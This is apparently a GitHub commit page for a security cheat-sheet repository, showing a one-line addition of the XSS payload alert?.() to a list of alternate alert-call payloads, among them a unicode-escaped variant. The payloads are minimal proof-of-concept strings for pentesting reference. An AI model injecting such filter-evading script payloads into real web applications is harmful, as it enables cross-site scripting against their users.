Skip to content

Commit 9fc431d

Browse files
committed
add one XSS payload
1 parent 0baedd9 commit 9fc431d

File tree

1 file changed

+1
-0
lines changed
  • content/docs/client-side

1 file changed

+1
-0
lines changed

content/docs/client-side/xss.md

+1
Original file line numberDiff line numberDiff line change
@@ -55,6 +55,7 @@ alert`1`
5555
<!-- Alternate calls -->
5656
["XSS"].map(alert)
5757
\u0061\u006C\u0065\u0072\u0074("XSS")
58+
alert?.()
5859
```
5960

6061
### Variable self

0 commit comments

Comments
 (0)